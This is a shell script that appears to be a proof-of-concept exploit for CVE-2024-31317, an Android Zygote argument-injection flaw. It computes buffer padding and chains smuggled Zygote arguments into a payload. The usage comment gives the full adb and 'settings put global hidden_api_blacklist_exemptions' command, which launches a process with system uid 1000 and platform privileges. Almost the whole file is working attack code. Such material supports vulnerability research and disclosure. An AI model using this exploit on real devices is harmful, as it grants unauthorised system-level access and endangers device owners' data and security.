#!/bin/sh
# PoC prepares the payload of commands to execute through the zygote injection CVE-2024-31317:
# https://rtx.meta.security/exploitation/2024/06/03/Android-Zygote-injection.html
#
# USAGE (android 13, with pre-13 use 12200 instead of 32768):
#    host$ adb push payload.sh /sdcard/
#    host$ adb shell
#   shell$ logcat -c; settings put global hidden_api_blacklist_exemptions "$(sh /sdcard/payload.sh 8192 32768 \
#          --runtime-args --setuid=1000 --setgid=1000 --runtime-flags=16787456 --mount-external-default --target-sdk-version=22 \
#          --setgroups=3003 --nice-name=com.android.settings --seinfo=platform:privapp:targetSdkVersion=33:complete \
#          --instruction-set=x86 --app-data-dir=/data/user/0/jackpal.androidterm --package-name=jackpal.androidterm --is-top-app \
#          android.app.ActivityThread seq=40)"; logcat
# Getting the values from parameters

buffer_size=$1
shift

zygote_read_abort_size=$1
shift

zygote_args_len=$#

# What's predefined in the executed command when execute `settings put global hidden_api_blacklist_exemptions <val>`
prefix="6 --set-api-denylist-exemptions      "
prefix_len=$(echo -n "$prefix" | wc -c)

add_chars=$(($buffer_size - $prefix_len + 2))
# For tests: echo the prefix, delete from prod:
#echo "6\n--set-api-denylist-exemptions"
# Making pad to fill the first buffer and amount should go in the next buffer
payload=$(printf "\n\n\n\n\n%${add_chars}s" $zygote_args_len  | tr ' ' A)

# Printing each zygote argument to run
for arg in "$@"; do
    payload="$payload\n$(echo "$arg")"
done
echo "$payload"
payload_len=$(echo "$payload" | wc -c)

echo -n ,,,,
add_chars=$(($buffer_size*2 - ($prefix_len + $payload_len) - 1))
printf "%${add_chars}s" 'X' | tr ' ' 'X'
echo E